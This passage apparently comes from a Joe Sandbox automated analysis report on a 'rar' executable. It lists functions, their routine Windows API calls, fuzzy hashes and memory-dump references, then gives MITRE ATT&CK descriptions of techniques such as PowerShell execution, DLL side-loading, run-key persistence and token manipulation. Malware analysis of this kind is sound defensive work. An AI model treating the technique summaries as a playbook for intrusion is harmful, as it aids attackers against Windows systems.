Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID: CloseFileModuleNameOpenQueryValue
String ID: AppData$Software\WinRAR\Paths
API String ID: 3617018055-3415417297
Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction ID: c19fcdaddc76ef4fc09e56eaba58923e94d6caad96b568e2276a7a1a86bcfb6a
Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction Fuzzy Hash: CE116022A1874686EF119F26B9025A9B360FF88BC4F445172EE8E67795DF3DD408CB02

Function 00007FF623E3978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF623E33CEF,?,?,00000000,00007FF623E33CAA,?,?,00000000,00007FF623E33FD9), ref: 00007FF623E397A5
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF623E33CEF,?,?,00000000,00007FF623E33CAA,?,?,00000000,00007FF623E33FD9), ref: 00007FF623E39807
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF623E33CEF,?,?,00000000,00007FF623E33CAA,?,?,00000000,00007FF623E33FD9), ref: 00007FF623E39841
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF623E33CEF,?,?,00000000,00007FF623E33CAA,?,?,00000000,00007FF623E33FD9), ref: 00007FF623E3986B

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction ID: e64f12bc8089e77ebc668fb8db523ca5bf93f675e97e3edfaf0bfcd25733608d
Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
Instruction Fuzzy Hash: 8B218221F0875181EA208F12A8411B9A6B4FF98BD0F084176EECEB3BE4DF3CD4568705

Function 00007FF623E32488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF623E3246C), ref: 00007FF623E324B0
TerminateProcess.KERNEL32(?,?,?,00007FF623E3246C), ref: 00007FF623E324BB
ExitProcess.KERNEL32 ref: 00007FF623E324CA

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction ID: f236cd7310daf1204cfd2be51a67eb7861e9d6d63a72fd558d014e7b1ddbe36e
Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction Fuzzy Hash: 56E01A20A1875542EE44AB309C823B923526F88B41F0054BACDCEA23A3CF3DA80C8252

Function 00007FF623DD681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF623DD68AE
_CxxThrowException.LIBVCRUNTIME ref: 00007FF623DD68BF

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction ID: 8fe1fc841b260915b19b57cf57a1cd03400f26381dcd394c841c52569e884f4d
Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction Fuzzy Hash: 56218457A08E8582DB01CF69D5410B87360FB98B88B18A721DF8D53656EF38E5E58700

Function 00007FF623E0915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF623E091CA
new.LIBCMT ref: 00007FF623E091F2

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e472e9346ac97a6ded21e421b0779c28132cfcd090790d4bc75d31863e080f4
Instruction ID: dd16ba4b84014eff5510a0f5a18f5170fb50f3ff3e6bebe1c0e16f1700bcb8d7
Opcode Fuzzy Hash: 9e472e9346ac97a6ded21e421b0779c28132cfcd090790d4bc75d31863e080f4
Instruction Fuzzy Hash: 0111B931509B8242EE00DB64ED423A9B2A4EF94790F240775EADD577EADF3CD055C305

Function 00007FF623DF2440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF623DF2480
GetLastError.KERNEL32 ref: 00007FF623DF248D

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction ID: 80b03a6e3d2edfe1f54011cea8f95ba4f7629a3da408b9d38179ed05016a538e
Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction Fuzzy Hash: 99014821A18A4282EF608BB8EC823786350EB54778F144B71D63C961E0CF7CE48AC741

Function 00007FF623E1B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00007FF623E17F72), ref: 00007FF623E1B41E
LoadLibraryExW.KERNELBASE ref: 00007FF623E1B449

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction ID: 6c417f769ef066ace565acd169bb57044a663a894fb8e1678183e8019d283247
Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction Fuzzy Hash: B5F01221B1858246FE709B20EC563FA6264BF9C784F804072E9CDE6799EF2CD6488B51

Function 00007FF623E171FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddbf2ba4f4fd47b9c365c7d5243f57a0975949615863d2f12eed567bd6091adb
Instruction ID: f3f043d1a47b6db7de4c5af2da89fd94a7b638f5107d3a1b7a1ad4096f2c714e
Opcode Fuzzy Hash: ddbf2ba4f4fd47b9c365c7d5243f57a0975949615863d2f12eed567bd6091adb
Instruction Fuzzy Hash: 8AE1C272A0868241FF219B2098472BE6751EF41F88F4441B6DECDAB7D6DF2DE849C712

Function 00007FF623DD72C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF623E0915C: new.LIBCMT ref: 00007FF623E091CA
Part of subcall function 00007FF623E0915C: new.LIBCMT ref: 00007FF623E091F2

new.LIBCMT ref: 00007FF623DD73DE

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9e8ef509cf6c131bd0f799b7968fd127fe3009836c6d6a2c7defeaf5bae96b7
Instruction ID: fe606c840b88172d474afd64e673c5a920d19f650bd2abb65aed8d22127edf2a
Opcode Fuzzy Hash: f9e8ef509cf6c131bd0f799b7968fd127fe3009836c6d6a2c7defeaf5bae96b7
Instruction Fuzzy Hash: 67514773518BD294EB009F74E8451ED37A8F744F88F18427ADE884BB9ADF389055C322

Function 00007FF623E3231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF623E32344

Part of subcall function 00007FF623E324D4: GetModuleHandleExW.KERNEL32 ref: 00007FF623E324F4
Part of subcall function 00007FF623E324D4: GetProcAddress.KERNEL32 ref: 00007FF623E3250A
Part of subcall function 00007FF623E324D4: FreeLibrary.KERNEL32 ref: 00007FF623E3252F

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction ID: 9df4489e203e61916bc0297722242679f0e87888581db1974e14e57b6fa3e87d
Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction Fuzzy Hash: 3B419261A1968382FF689B15DC521B96391AF84744F0044B7D9CDEB6E2DF3CE84D8742

Function 00007FF623E1A924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE ref: 00007FF623E1A998

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction ID: 9f0c7ac8ddb738c8c51e0b769a56bf3ff01aa8e9e127e6cc120244d5128c4104
Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction Fuzzy Hash: CB01626170C69245EE10AF12B8060BAE611BB99FC0F584876EFCDABB5ACF3CD4864705

Function 00007FF623E038A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction ID: a97db0cbc040c11eb10af2b4a04e6cb47fe4deec50a16a879ce5f4810b000a70
Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction Fuzzy Hash: B4E0BF50F1D30741ED5926621D930B902401F5AB81E5564FACD9FB63C2DF1DE45D5B22

Function 00007FF623DF1930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF623DF1958

Memory Dump Source

Source File: 00000058.00000002.1935549764.00007FF623DD1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FF623DD0000, based on PE: true

Associated: 00000058.00000002.1935512900.00007FF623DD0000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935758707.00007FF623E58000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935790666.00007FF623E59000.00000008.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E5A000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E64000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E6E000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935831738.00007FF623E76000.00000004.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1935976148.00007FF623E78000.00000002.00000001.01000000.0000001F.sdmpDownload File
Associated: 00000058.00000002.1936036068.00007FF623E7E000.00000002.00000001.01000000.0000001F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_88_2_7ff623dd0000_rar.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction ID: 93e9473ebf6dd243b4f9c3b8268acebf53fba6ef2cc622a94b4023a5ab4b967a
Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction Fuzzy Hash: 9CF0F46290834244FF248BA0E8823746650DB10B78F585771DA7E910D4CF28C897C792

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

